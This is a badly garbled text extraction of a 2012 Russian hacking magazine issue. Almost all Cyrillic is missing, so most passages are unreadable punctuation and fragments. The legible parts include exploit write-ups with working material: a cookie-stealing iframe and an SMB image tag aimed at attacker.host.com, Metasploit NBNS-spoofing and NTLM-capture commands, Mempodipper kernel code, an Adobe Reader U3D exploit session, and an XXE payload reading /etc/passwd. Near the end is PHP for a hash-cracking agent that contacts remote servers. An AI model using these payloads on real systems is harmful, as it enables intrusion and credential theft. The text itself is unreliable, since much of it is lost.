03 /158/ 2012

. ,
.
. ,
.
: .,
,
, .
, ,
Ruby. , .

: ,
HR-, , ? .
, .
,
,
. .
,
, .
: , ! !
, . ,
- ,

.
,
. .
, ,
,
.

.

, ,
. , ,
,
,
.
,
,
.
- ,
, .
. HR 90
. :
60 120
.
150, 60. .

1015 , 34
. HR
: .


. ,
. Google

,
.
.


.
, ,

033

COVER STORY
, ,
,
.

, , . ,

.
,
. , , .
, .
: ,
, ,
. ,
, ,
!. .

. , , PM, ,
.

, .
, , !

.

.

,
.
,
, , ,
, ,

.

?
, , ,
- , . , ,
.

. , .
.
, 19
: !


. ,
,

,
.
. ,
.

, .


. 30 . ?
, ,
.
, ,
:
,
, .

. , . , .

, ,
. ,
, .
, , ,
. ,
, .
,
,
,
.

,
.
, Mail.ru, - , .
,
.
, ,
. :
, . :
,
,
,
. -
. , :
,
. , ,
, , ,
- .
, 2829 , .
.
.
,
.
, Greenfield Project.
, . , ,
,
.


. ,
Mail.ru, Google
.
,
.

,
,
. ,
. ,
! :)

, , -


. .


, . ,
,
.

.
,
? , . ,
,
PRUFFI ,
.
, ,
, . z

034

03 /158/ 2012


(112011)

0-3

3-5

5-10

10

Team leader

40 000 - 80 000
30 000 - 70 000 *

70 000 - 150 000


70 000 - 180 000 *

170 000 - 250 000


180 000 - 250 000 *

250 000 - ...


250 000 - ... *


Android, iOS

30 000 - 70 000
20 000 - 70 000 *

70 000 - 120 000


50 000 - 90 000 *

120 000 - 150 000


90 000 - 120 000 *

150 000 - ...


120 000 - 150 000 *

Perl/PHP

40 000 - 60 000
30 000 - 60 000 *

70 000 - 110 000


60 000 - 100 000 *

90 000 - 150 000


90 000 - 120 000 *

150 000 - ...


120 000 - 150 000 *

Ruby on Rails

30 000 - 60 000

70 000 - 100 000

100 000 - 150 000

150 000 - ...

0-3

3-5

5-10

10

Windows

30 000 - 50 000

50 000 - 70 000

80 000 - 100 000

100 000 - ...

Unix,Linux admin

30 000 - 60 000
20 000 - 60 000 *

60 000 - 90 000
60 000 - 90 000 *

90 000 - 110 000


90 000 - 110 000 *

110 000 - ...


130 000 - 150 000 *

DBA (Oracle, MySql, Postgres


..)

40 000 - 80 000
40 000 - 80 000 *

80 000 - 130 000


80 000 - 130 000 *

130 000 - 150 000


130 000 - 150 000 *

150 000 - 180 000


150 000 - 180 000 *

90 000 - 150 000


90 000 - 150 000 *

150 000 - 180 000


150 000 - 180 000 *

180 000 - 250 000


180 000 - 250 000 *

0-3

3-5

5-10

10

40 000 - 80 000
40 000 - 80 000 *

80 000 - 150 000


80 000 - 130 000 *

150 000 - 200 000


130 000 - 150 000 *

200 000 - ...


150 000 - 180 000 *

Flash-

40 000 - 80 000
40 000 - 80 000 *

80 000 - 150 000


80 000 - 150 000 *

150 000 - 200 000


150 000 - 200 000 *

200 000 - ...


200 000 - 230 000 *

Game producer

40 000 - 70 000
40 000 - 90 000 *

70 000 - 120 000


90 000 - 120 000 *

120 000 - 200 000


120 000 - 150 000 *

200 000 - ...


150 000 - 180 000 *

PRUFFI (www.pruffi.ru/analitika)

GAME

50%

50%

50%

03 /158/ 2012

035

Preview

33 .
.

PCZONE
38

?


,
-?
eBay!

.
.


.

,
.
-
.

PC ZONE

I can
crack
it!

42



CAPTCHA.
, OCR-?

70

036


--
,
.

48


, ,
, ,
IDS ,
w3af.

66

I CAN CRACK IT!




. .

MALWARE

76


2011
.
?

82


Windows Phone 7.5
. ?

Microsoft.

03 /158/ 2012

PC ZONE

(biohedge@gmail.com)


?

Android?
? , , ?
? ,
, ,
-. , ,
.

MADE IN CHINA
Made in China
, .
, ,
. ,

DealExtreme.com,
.
.

038

,
, .
,
.
,
, ,
-

, . ,
, . ?

03 /158/ 2012

FocalPrice.com
:
:
( )
:

14 25


70 000 100 (, ). , .
, ,
, .

( ),
( , ).
, , .
, eBay (-,

,
). ,
-.
,

, - ,
.
,
,
.

,

, .
,
, .
PayPal.
FocalPrice
WebMoney, .
,
,
.
, ,

.
, , , . ,
. $20,
- .
, , ,

: , , .


1. .
: retailmenot.com (,
), chinaprices.ru, . ,
< >.
2. ,
. searchsku.ru
. chinaprices.ru.
3. ,
. . , .
, ebay-forum.ru mySku.ru.
4. - (, , )
.
.
5. .
PayPal. WebMoney Qiwi, ,
, PayPal
.
6. , . ,
. , ,
- .

03 /158/ 2012


PayPal
WebMoney
Qiwi

039

PC ZONE

Dealextreme.com
:

:
:

21 40

DealExtreme.com.

- .
:
, , ,
, . :
. ,
. ,
. TinyDeal,

,
.
PayPal ,
.

-,
$15.
, :
Dealextreme ,
: ( ),

.
: .
,
, ,
().

. PayPal, WebMoney. ,
PayPal
, .
$150.
.
, ,- (, ,
). -
$35,

: ,
-
$20.
$2-3.
,
.
: , , -
,
.

Tinydeal.com
:

:
:

7 25

- ,
,

.
, ,
. -,
,
. ,
.
,

(5-7%). (
TD Points),
.

$200
-

040

03 /158/ 2012

Pandawill.com
:
:
:

25 35

-, . , ,
. , .

,


, .
(
).
Pandawill

, ,
.

.
PayPal Visa Master Card,

. . , ,

-:

$50 (
).

:
,
.


NOWSUPPLIER.COM

MERIMOBILES.COM

BUYINCOINS.COM

7 25


,
:
,
( $30 )
.
, ,
-
. , PayPal
, .

,
,
.
.
,

03 /158/ 2012

14 25

7 25

-
. ,
.
, 3G-
.
, PayPal ,

.

(, ,
) ,
.
.
.
,
FocalPrice
TinyDeal.

.
:
.
,
PayPal.

. :
- ,
. -
, .
: , , .
! z

041

PC ZONE

( gursev.kalra@foundstone.com )

CAPTCHA


CAPTCHA,
. -,
,

$1
1000 .


,


.


.
042

CAPTCHA
CAPTCHA
.
, , .
(,
, , ),
.
, ,

CAPTCHA: . ,
-

. Captcha- #135 #126


.
TesserCap,
CAPTCHA. , .

TESSERCAP
? ,
CAPTCHA
.
, ,
,
. -

CAPTCHA- TesserCap

03 /158/ 2012

, ,

, OCR-
,
. ,
,
McAfee. ?
,
.
-,

www.quantcast.com/top-sites-1.

, Wikipedia, eBay,
reCaptcha.

,
.
,
OCR-,
. TesserCap

:
1. ,

.
2.
Tesseract , CAPTCHA-.
3.
.
, ,
, .
,
.
, ,

.

. MAIN
: Main, Options,
Image Preprocessing.
,

CAPTCHA-, ( ,
),
.
URL- URL, -
. URL- :
CAPTCHA-,

URL- src <img>. , xakep.
ru www.xakep.ru/common/rateit/
captcha.asp?name=xakep.ru. ,
,
.
12 ,

. ,
. Start
Stop .



TesserCap.
.

Foundstone,
McAfee.
, ToorCon, NullCon ClubHack.
TesserCap SSLSmart.
,
.
Ruby, Ruby on Rails C#.

03 /158/ 2012

xakep.ru
. ,


Foundstone, ,
,

.


,



.


,
. ,
,
, .
,


Send To Image Preprocessor.

. OPTIONS

TesserCap.
OCR-,
-, , HTTP,
: ,
, ,
.
.
, OCR-.

Tesseract-ORC,
.
. , , xakep.ru , ,
. ,
? ,
,
xakep.ru ,
: Numerics.
Upper Case? ,
? , . , , ,
\Program Files\Foundstone
Free Tools\TesserCap 1.0\tessdata\configs\.
:
Numerics Lower Case,
lowernumeric, tessedit_char_whitelist.

043

PC ZONE
,
.

,
.
,
Http Request Headers. , - ,
. TesserCap
,
HTTP
, Accept, Cookie Referrer
. . - (Fiddler, Burp,
Charles, WebScarab, Paros . .),
Http Request
Headers. , , Follow Redirects.
, TesserCap
.
URL-
,
.
, / ,
.

.
CAPTCHA-
. CAPTCHA-,
Enable
Image Preprocessing,
OCR- Tesseract
.

. IMAGE
PREPROCESSING

.
,
.

.

.
, ,

.
.
1.

CAPTCHA-. ,
, ,
:
for(each pixel in CAPTCHA)
{
if (invertRed is true)
new red = 255 current red
if (invertBlue is true)
new blue = 255 current blue
if (invertGreen is true)
new green = 255 current green
}


CAPTCHA-.
2.


CAPTCHA

Wikipedia

2030%

Ebay

2030%

reddit.com

2030%

CNBC

>50%

foodnetwork.com

8090%

dailymail.co.uk

>30%

megaupload.com

>80%

pastebin.com

7080%

cavenue.com

>80%

.
257
( -1 255) . RGB

:
1. -1,
.
2. -1,
(, )
. 0
, 255
. .
3. ( )
.
, .
,

:
1. Average (Red + Green + Blue)/3.
2. Human (0.21 * Red + 0.71 * Green + 0.07 *
Blue).
3. Average of minimum and maximum color
components (Minimum (Red + Green + Blue)
+ Maximum (Red + Green + Blue))/2.
4. Minimum Minimum (Red + Green + Blue).
5. Maximum Maximum (Red + Green + Blue).
CAPTCHA


.

044

4.

CAPTCHA-,

03 /158/ 2012

, .
,

Bucket Cutoff.
Passes ,
.

. :
.
TesserCap .

( ).
.
.
,
Save Mask. ,

03 /158/ 2012

.

Save Mask .
5.


.
20 (bucket)/.
,
0 12, 0,
,
13 25,
1 . .
,
:
1. (Leave As Is).
2. (White).
3. (Black).
, / ,
.

6. (cutoff)

.

:
if (pixels grayscale value <= Cutoff)
pixel grayscale value = (0 OR 255)
-> ,
(<= => : Set Every Pixel
with value <=/=> Threshold to 0.
Remaining to 255)

CAPTCHA
.
7: (chopping)
, , bucket- CAPTCHA

, .

045

PC ZONE
: ,
,
, 0 ()
255 () .
CAPTCHA , .

,
.
OCR-.

8: .
,
TesserCap ,
, CAPTCHA-
CAPTCHA,
OCR .

.
, ,
.

10:
CAPTCHA-
OCR- .
Solve
, OCR-
.
, ,
.

(Enable Image Preprocessing)

.

9:
-

046

for(each pixel in CAPTCHA)


new grayscale value = 255 current
grayscale value


, ,
, - .
xakep.ru.
,
. ,
, . , (
, )
. , ,
. URL

TesserCap. , 12
, Start.
12 . ,
,
-Failed- ,
. , ,

. .
12

03 /158/ 2012

(Send To Image
Preprocessor).
12 , , , ,
(Character Set = Numerics).
Image Preprocessing
. ,

( , ,
) ,
. Smooth Mask
2
. Grayscale buckets
. 154 , ,
, 0, ,
, 255.
, chopping 10.
,
Solve.
714945,
711435.

03 /158/ 2012

, , .
, ,
.
pastebin.
com, .
xakep.ru,


(Enable Image Preprocessing).
Main , Start,
, . , ,
/ ( Mark as Correct/Mark as
InCorrect). Show Statistics. -,

CAPTCHA. , TesserCap
.

CAPTCHA-

- .


. ,
CAPTCHA-, ,
. ,
,
reCaptcha .
,
,
CAPTCHA.
API , .
(, ), .
:). z

047

PC ZONE

(oxdef@oxdef.info)

-

- W3AF

WARNING



.


.

w3af

-.

, ,

,
.
W3AF?
- , . , , ,
,
. , ,
. , -:
1. .
2. ().
3. .
4. .
w3af (w3af.org).
- (Web Application
Attack and Audit Framework),
.
.
, :).
,
Rapid7 ! Python, ,
, . w3af
, . , ,
Mozilla Firefox, .

W3AF?
w3af

048

w3af : .
,

03 /158/ 2012

w3af

. , ,
.
, , .
.
. W3af , .
,
. , , .
1. (
discovery-) ,
, -. . -,
webSpider. Discovery- , , , .
,
, .
2. - (
) , , XSS, SQL-, (R)LFI
.
3. Grep- , , UNIX-, . :
grep- HTTP-/,
(
, IP-,
. .).
JavaScript-, :
document.write
document.location
eval
...

DOM based XSS (www.owasp.org/index.php/


DOM_Based_XSS).
4. Bruteforce-, ,
HTTP Basic . , formLogin
,
password.
.
5. Attack- ,
. , ,
, , . -,
. ;)
6. Mangle- -

03 /158/ 2012

- .
UNIX,
sed, HTTP-. hidden- ? !
7. Evasion- IDS. -?
- .
8. Output- : w3af. ,

PDF, - .
9. Auth- : -,
, ,
-.
.
-,
, . , w3af
,
. w3af
auth-, .
, ,
:
SMS, .. Python!

-
, w3af,
. ,
Itter. ,
, , , ,
140 . :)
- :
LAMP (Linux-Apache-MySQL-PHP);
;

;
AJAX;
, , !


- . w3af (,
, ) :
gtkUi , GTK;
consoleUi UI (
, ).
. GUI- ./w3af_gui - 1. :
, , . .

049

PC ZONE

w3af

- w3af

, ,
w3af. , ini-,
w3af, URL, , core-
. , Itter
My Profile, discovery webSpider pykto ( Nikto Python),
grep- DOM XSS
XSS- SQL-. , Start
, . , w3af Log,

. -
.
20 . ,
w3af.
DOM XSS, XSS!
, /index.php, , . Pykto, ,
Apache phpinfo- /test.php.
-
-. Apache/2.2.16 Debian GNU/
Linux PHP. ,
-, URLs -
. HTTP-,
.

Suite, Firefox Tamper Data.


( ) HTTP- - . , w3af.
, :
discovery- spiderMan;
Intercepting Proxy .

2.0
,
-.
-,
JavaScript, AJAX, JSON, HTML5 .
:)
-.
.
- /article.php?id=68,
, , ,
-. , , <Ctrl-U>,
HTML-,
JavaScript HTML.
-, .

-. ,
JS -? ,
Selenium/WebDriver?

, OWASP WebScarab Burp

050

spiderMan, ,
, discovery-.
. . - 127.0.0.1:44444
( FoxyProxy Firefox,
). SpiderMan
webSpider,
. spiderMan , -. Log- :
[Mon 30 May 2011 12:08:22 AM MST] spiderMan proxy is running
on 127.0.0.1:44444.
Please configure your browser to use these proxy settings and
navigate the target site. To exit spiderMan plugin please
navigate to http://127.7.7.7/spiderMan?terminate .
[Mon 30 May 2011 12:15:29 AM MST] The user is navigating
through the spiderMan proxy.
[Mon 30 May 2011 12:15:29 AM MST] Trapped fuzzable requests:
[Mon 30 May 2011 12:15:29 AM MST] http://localhost/index.php
| Method: GET
[Mon 30 May 2011 12:15:32 AM MST] http://localhost/user-info.
php | Method: GET
[Mon 30 May 2011 12:22:36 AM MST] SQL injection in a MySQL
database was found at: "http://localhost/user-info.php",
using HTTP method GET. The sent data was: "id=d'z"0".
This vulnerability was found in the request with id 3911.
[Mon 30 May 2011 12:27:10 AM MST] Cross Site Scripting was
found at: "http://localhost/index.php", using HTTP
method GET. The sent data was: "limit=15&u=<ScRIPT>
a=/UzmE/%0Aalert(a.source)</SCRiPT>". The modified parameter
was "u". This vulnerability affects ALL browsers. This
vulnerability was found in the request with id 4042.

, spiderMan, , webSpider
. , - SQL XSS-! , AJAX-,
.
. W3af
, ,
. -

03 /158/ 2012

Exploit . SQL- sqlmap


(sqlmap.sourceforge.net), w3af.


HTTP-
: Telnet, cURL, Wget, Python + urll ib,
, :) , . w3af
.
HTTP- ? !
Python. HTTP-,
HTTP-,
.
- URL MD5. , echo -n "admin" | md5sum
, . SQL-
-,
diff. , , ,
,
HTML, AJAX Python. , : , ,
JS-
. -
( ).
History HTTP . , , .
:
, , , 2xx- .
.
,
.
AJAX-
/user-info.php?id=1, . .
Audit request with... , SQL-.

03 /158/ 2012

SQL-

! SQL-. :) , ,
.
. PHP
, . HTTP-
-: /user-info.php?id=1 /user-info.
php?id=1%2b1,
. SQL-
,
( ).
.

OUTRO
W3af
-. ,
.
, ,
, .
, Python,
.
, , w3af , .
,
(w3af.sourceforge.net) IRC- #w3af
Freenode. z

w3af HTTP-

051

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK
MSSQL

Microsoft SQL server .


.
1. Microsoft, SQL server
: integrated (sign-on), , native, , .
.
2. , ,
. , , . ,
. ,
,
arp-spoofing ? ,
- . .
f0rki (bit.ly/
sBg07r). , . , MSSQL Tabular DataStream protocol
(bit.ly/z3oVPR). . ? ?
Wireshark f0rki
: SSL ( ),
TDS. .
. TDS-,
PRELOGIN.
,
. ENCRYPTION, :

052

1.
2.
3.
4.

, : ENCRYPT_OFF 0x00.
: ENCRYPT_ON 0x01.
: ENCRYPT_NOT_SUP 0x02.
: ENCRYPT_REQ 0x03.

ENCRYPT_OFF. , ,
. ENCRYPT_NOT_SUP,
. ,
MiTM- ,
,
.
,
Metasploit Framework,
. , , . ,
TCP-,
MSSQL- ,
, , , . ,
, ,
arp-spoofing-,
. f0rki ,
shell-.

03 /158/ 2012

EASY HACK

UI-REDRESSING

][ ,
clickjacking. ,
. clickjacking
, , uiredressing . ,
, .
, cookiejacking.
Rosario Valotta HITB 2011
. , , HTTPS-! :
IE ( ).
, -.
-, 0-day,
IE. ,
. , IE
, : Internet, Intranet,
. .
, NTLM-
Intranet . , :
Local Machine Zone
Local Intranet Zone
Trusted Sites Zone
Internet Zone
Restricted Sites Zone


- . ,
. , <iframe
src="file://c:/boot.ini">
.
0-day , -
,
. ,
:
<iframe src="file:///C://Documents and Settings/
%user_name%/Cookies/%user_name%@google[1].txt"> </iframe>

%user_name% .
, . , Google,
.
-, 0-day-,
clickjacking' content extraction ( BlackHat Europe 2010, goo.gl/Z8YNw).
? iframe ,
.
- , - ,
iframe localhost .
. drag & drop,
.
, , ,
. -
. , content extraction , ,
drag & drop. clickjacking-
, , , .

03 /158/ 2012

( Rosario )
(). iframe ,
.
. iframe scrollspeed
. , ,
, () iframe
. , ,
iframe,
, drag & drop', . ,
, Rosario Valotta
(bit.ly/iNxvTb), , , content extraction, JavaScript.
, .
. -,
Windows, :). XP
Vista/7 . XP C://Documents and
Settings/%user_name%/Cookies,
C:/Users/% user_name %/AppData/Roaming/Microsoft/Windows/
Cookies. , ,
User-Agent, .
,
JavaScript. -, , , ,
, .
SMB.
.

: <img src="\\attacker.host.com\any.jpg"></img>.
,
445 , web. , !
.
. 2012-, Microsoft
IE 2011-. ,
Microsoft
.
user_name@domain[counter].txt 87TVLBDW.txt.
. , ,

, IE.

053

/ EASY HACK

( ).

. ,
, ?
, .
,
.
,

,
. , makensi.es/stf.
-,
, , .

WordPress

DNS NETBIOS

, IP-
DNS.
( ),
. DNSSEC,
, . DNS ,
arp-poisoning,
,
. ,
- , . , , IDS, , -
. ,
.
. , XXX.COM. , , ,
Windows IP- .
IP , hosts (C:\Windows\System32\drivers\etc\hosts). ,

, DNS-. Windows , NetBIOS Name Service.


, NetBIOS Windows ,
NetBIOS Name Service (NBNS) ,
NetBIOS IP-.
WINS-, (, ).
DNS-
. , NBNS
. DNS- ,
XXX.COM DNS-?

:
(.com, .ru). ?
, , , ,
- . , ,
(, ),

. ,
DNS-

URL

054

03 /158/ 2012

EASY HACK

NBNS-

, .
NBNS-.
Transaction ID NBNS-. ,
, , ,
. , MSF
. :
1. NetBIOS-: use auxiliary/spoof/
nbns/nbns_response.
2. : Set REGEX *google*.
3. , IP- : set spoofip xa.kep.
IP.address.
4. : run.
. (Tim Medin)
(goo.gl/Jz2Q9), NTLM-.
, ,
( makaka), (makaka.
com). Windows ( !). IE ,
. , . ,
NTLM- HTTP ( SMB):
1. : use auxiliary/server/
capture/http_ntlm.
2. , : set URIPATH.
3. , -: set SRVPORT 80.

4. : run.
. , NBNS-,
- .
c XXX.com, - ,
( JavaScript),
XXX.com. XXX.
com, ,
DNS NBNS. ,

, -
.
,
.
:
1. NBNS- .
2. web-
( ) , XXX.com (, asdasdasd.XXX.com).
3. , - , NBNS .
4. asdasdasd.XXX.com, , ,
NBNS.
5. XXX.com asdasdasd.XXX.com,
.
,
. ,
(XXX.com),
(.XXX.com).

LOCALHOST WINDOWS


localhost
127.0.0.1. ? , IE, , Windows. , Python urllib2
. , ,
(127.0.0.1)
(0.0.0.0).
- , Eldar Marcussen. ,

03 /158/ 2012

IE .NET framework
localhost 127.0.0.1. IE9
, -localhost.
, -, . -,
IP 127 , ,
127.1.2.3,
. -,
hosts (%windir%\drivers\etc\hosts)
localhost: 127.0.0.1 localh0st.

055

(ivinside.blogspot.com)
(115612, . , .1)

Linux,
, Microsoft Office Acrobat
Reader, XXE- phpMyAdmin.
!

056

Linux

CVSSV2

6.8
(AV:L/AC:L/AU:S/C:C/I:C/A:C)

BRIEF

/proc/<PID>/mem ( <PID>
), Linux
.
2.6.39 #ifdef,
, ,

.
, .
, .
, : ,
2.6.39,
.

03 /158/ 2012

int match;
rcu_read_lock();
match = (ptrace_parent(task) == current);
rcu_read_unlock();
if (match && ptrace_may_access(task,
PTRACE_MODE_ATTACH))
return mm;

EXPLOIT

/proc/<PID>/mem :
static int mem_open(struct inode* inode, struct file* file)
{
file->private_data = (void*)((long)current->self_exec_id);
file->f_mode |= FMODE_UNSIGNED_OFFSET;
return 0;
}

,
. . , ( ):
static ssize_t mem_write(struct file * file,
const char __user *buf, size_t count, loff_t *ppos)
{
/* ... */
struct task_struct *task = get_proc_task(
file->f_path.dentry->d_inode);
/* ... */
mm = check_mem_permission(task);
copied = PTR_ERR(mm);
if (IS_ERR(mm))
goto out_free;
/* ... */
if (file->private_data != (void *)((long)
current->self_exec_id))
goto out_mm;
/* ... */

: check_mem_permission self_exec_id.
check_mem_permission __check_
mem_permission, :
static struct mm_struct *__check_mem_permission(
struct task_struct *task)
{
struct mm_struct *mm;
mm = get_task_mm(task);
if (!mm) return ERR_PTR(-EINVAL);
if (task == current) return mm;
if (task_is_stopped_or_traced(task)) {

}
mmput(mm);
return ERR_PTR(-EPERM);
}

,
(task == current), , ptrace. ptrace ,
task == current.
? , suid. su:
$ su "yeeeee haw I am a cowboy"
su: user yeeeee haw I am a cowboy does not exist

, stderr ,
. , /proc/<PID>/mem,
lseek() , dup2()
/proc/<PID>/mem, ,
-. . , self_exec_id
, /proc/<PID>/mem. self_exec_id
,
.
, : fork() exec() .
self_exec_id,
. exec(), self_exec_id .
/proc/<PID >/mem,
. su
exec(), self_exec_id.
, ,

dup2 -> exec.
, . , ASLR
, :
$ readelf -h /bin/su | grep Type
Type:
EXEC (Executable file)

, su .text ( DYN, EXEC).


, su
PIE, , ASLR .text , .
Mempodipper exploit-db.com,
EDB-ID 18411. .
TARGETS

Linux >=2.6.39, 32- 64-.


SOLUTION
Mempodipper

03 /158/ 2012

057

MS12-005

CVSSV2

9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)

BRIEF


.
web- Office.
Object Packager.
, Object Packager ClickOnce- ,
Office.
, . , ClickOnce
, Windows, .
ClickOnce: -,
, -.

, ,
, -
. ClickOnce
,
.

PowerPoint. Custom Animation OLE-.
,
OLE ( Object Actions): Activate
Contents ( ) Edit Package (
). Activate Contents ,
.
, Custom Animation -

,
ClickOnce- (Full Trust).

.
. Custom Animation ,
PowerPoint . PowerPoint , .
ClickOnce-
, .
EXPLOIT

, MS12-005, :
1. .
packager.dll , ,
( execExtTable).
.text:02FA1D98
; DATA XREF:
.text:02FA1D98
.text:02FA1D98
.text:02FA1D9C
.text:02FA1DA0
.text:02FA1DA4
.text:02FA1DA8
.text:02FA1DAC
.text:02FA1DB0
.text:02FA1DB4
.text:02FA1DB8
.text:02FA1DBC
.text:02FA1DC0
.text:02FA1DC4
.text:02FA1DC8
.text:02FA1DCC
.text:02FA1DD0

execExtTable dd offset a_exe


CPackage::_GetCurrentIcon(_IC *)+69|o
; CPackage::_GiveWarningMsg(HWND__ *)+5E|o
; ".exe"
dd offset a_com ; ".com"
dd offset a_bat ; ".bat"
dd offset a_lnk ; ".lnk"
dd offset a_cmd ; ".cmd"
dd offset a_pif ; ".pif"
dd offset a_scr ; ".scr"
dd offset a_js ; ".js"
dd offset a_jse ; ".jse"
dd offset a_vbs ; ".vbs"
dd offset a_vbe ; ".vbe"
dd offset a_wsh ; ".wsh"
dd offset a_sct ; ".sct"
dd offset a_vb ; ".vb"
dd offset a_wsc ; ".wsc"

Python-

058

03 /158/ 2012

.text:02FA1DD4 dd offset a_wsf ; ".wsf"


.text:02FA1DD8 dd offset a_wmz ; ".wmz"

,
, .
IsProgIDInList:
.text:02FA72F4 push 11h ; int
.text:02FA72F6 push offset execExtTable ; dangerousTable
.text:02FA72FB push esi ; pExtName
.text:02FA72FC push 0 ; int
.text:02FA72FE call ?IsProgIDInList@@YGHPBG0PBQBGI@Z
; IsProgIDInList(ushort const *,ushort const *,
; ushort const * const *,uint)

,
.
py pl. MS12-005 AssocIsDangerous(),
:

A , .
PO , , 3D-.

.text:02FA6A11 push eax


.text:02FA6A12 call ds:__imp__AssocIsDangerous@4
; AssocIsDangerous(x)
.text:02FA6A18 test eax, eax
.text:02FA6A1A jnz short loc_2FA6A42

EXPLOIT

2. .
packager.dll ,
. CPackage___
GiveWarningMsg(HWND hWnd).
execExtTable, ,
execExtTable, .
TARGETS

Windows XP, Windows Vista, Windows Server 2008 SP2, Windows 7.


SOLUTION

, .

Adobe Reader
U3D-

CVSSV2

3D- pdf-

10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)

:
4 OpenAction
JavaScript.
14 JavaScript 15.
15 JavaScript- heap spraying,
.
11 3D- .
10 3D-, (,
).
, :
10 (/3D, /U3D).
11 (/3DI, /3DD, /3D,
/3DA).
15 JavaScript- heap
spraying (
3D-).
Metasploit (
):

BRIEF

U3D-.
.

. DEP ROP-,
icucnv36.dll. ASLR JavaScript-, heap spraying.
U3D-, ,
:
U3D 3D-.
3DD () 3D-,
.
3DA () , ,
3D-.
3DI () , . true
, false JavaScript.
DIS () , 3D-
.

03 /158/ 2012

msf > use exploit/windows/fileformat/adobe_reader_u3d


msf exploit(adobe_reader_u3d) > set payload windows/exec
payload => windows/exec
msf exploit(adobe_reader_u3d) > set cmd calc.exe
cmd => calc.exe
msf exploit(adobe_reader_u3d) > show options
Module options (exploit/windows/fileformat/adobe_reader_u3d):
Name
Current Setting Required Description
------------------ -------- ----------FILENAME
msf.pdf
yes
The file name
OBFUSCATE false
no
Enable JS obfuscation
Payload options (windows/exec):
Name
Current Setting Required
------------------ -------CMD
calc.exe
yes
EXITFUNC

process

yes

Description
----------The command string to
execute
Exit technique:
seh,thread,process,none

059

/
Exploit target:
Id Name
-- ---0
Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3
msf exploit(adobe_reader_u3d) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /home/pikofarad/.msf4/local/msf.pdf

Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 Windows XP SP3.


SOLUTION

, .

LFI phpMyAdmin XXE-

CVSSV2

>
<foo>&bar;</foo>

bar, /etc/
passwd,
. , XML-
.
, . :

TARGETS

[
<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >
]

5.0
(AV:N/AC:L/Au:N/C:P/I:N/A:N)

BRIEF

Marco Batista
Local File Including.
, XXE- (XXE XML eXternal Entity),
XML-.
, XML- (, GET -) XML.
xmlDB, :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>

SQL, XXE. XML


(entities), DTD. ,
(external entities).
URI, . , URI
, , , :

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE foo
[
<!ELEMENT foo ANY>
<!NOTATION GIF SYSTEM
"http://my-cool-site.com/ShowGif.exe">
<!ENTITY bar SYSTEM "http://not-my-cool-site.com/bar.gif"
NDATA GIF>
]
>
<foo>&bar;</foo>

ShowGif.exe bar.gif. XML-


. XML- OWASP
(goo.gl/B8G9C).
EXPLOIT

phpMyAdmin
XML-. , XML- ( -)
.
libraries\import\xml.php,
simplexml_load_string() :
$xml = simplexml_load_string($buffer,
"SimpleXMLElement", LIBXML_COMPACT);

phpMyAdmin
libxml_disable_entity_loader(), XML-.
SECFORCE Metasploit . LFI :
1. phpMyAdmin .
2. XML-, XXE-
.
3. XML-.
4. .
.
TARGETS

PhpMyAdmin 3.4.x 3.4.7.1 3.3.x 3.3.10.5.


SOLUTION

<?xml version="1.0" encoding="utf-8"?>


<!DOCTYPE foo

060

phpMyAdmin 3.4.7.1 (3.3.10.5)


. z

03 /158/ 2012

>> coding

|qbz| (http://essenzo.net)

PHP-
Windows


.
- C, ASM, - Python. ,
,

PHP. ,

,
.
,
,
- .

WWW
bit.ly/WdbrO

;
3.14.by/ru/md5

;
www.f2ko.de
.

DVD



,
.

DO U SPEAK ENGLISH? NO, PHP


, XSS,
. , ,
-, .
.
-,
. .
, .
, , .
.
, - , . 20
- .
.
.

062

03 /158/ 2012

PHP- Windows

. ,
? ,
, , . , php2exe-.



. , , . , ,
.
, ,
. , , ,
, .
, .
. ,
,
.
, ,
.
, . ,
, ,
(), .
,
, exe,
.
:
md5. { } { } { }


( = ),
, ,
. ,
, ,
- .
:

03 /158/ 2012

function mySettings()
{
$settings = file_get_contents(
'http://adres.com/?do=mysettings');
if ($settings != '')
{
list($status, $statusdata) =
explode('|', $settings, 2);
$config = array('status' => $status,
'data' => $statusdata);
return $config;
}
else
return false;
}

, , ,
, , |.
, .
():
function bruteHashes($hashes)
{
//
file_put_contents('./brute.txt', implode("\r\n", $hashes));
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamworking');
//
passthru('md5.exe brute.txt vocabulary.txt results.txt');
//
$uploader = ftp_connect('ftp://adres.master.servera.com');
ftp_login($uploader, 'login', 'password');
ftp_put($uploader, './results/'.time().'.txt',

063


'./results.txt', FTP_ASCII);
ftp_close($uploader);
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamfinished');
}

,
,
,
. ,
. ,
,
(- ), , .
, ,
. .
, :
function installVocab()
{
$vocabulary = file_get_contents(
'http://adres.com/unique_vocabulary.php');
file_put_contents('./vocabulary.txt', $vocabulary);
}

. , ,
,
:

, , ,
.
,
-.
,
-.
,
( ):
brute ;
clean ,
;
install ;
exit .
.
- 300 .
.
, , ( )

if (!file_exists('./vocabulary.txt'))
{
installVocab();
}
startScheduler();

, ,
exe. Bambalam PHP EXE
Compiler/Embedder.
, exe PHP. , , ( !).
PHP 4.0,
. Bambalam :
bamcompile [-options] infile.php [outfile.exe]

PHP DevelStudio
bit.ly/amiS4r

PHP
.

,
,

.

064

Php2exe
bit.ly/ylV4vR

PHP
.

,


php5ts.dll.

Bambalam Embedder
bit.ly/wpSniZ.
,
GUI
.


,
cURL.

py2exe
bit.ly/3KkIKw

,
, .

,
,

.

Perl2Exe
bit.ly/y29qTB

exe.

,


.

03 /158/ 2012

PHP- Windows

MD5-

, . . -,
,
, , , .
IP- (
,
, ,
NAT), ,
.
. , , ,
lastcallback. , ,
. ,
.
300 (
), ,
. . ,
, , , , |.
, ,
,
. ,
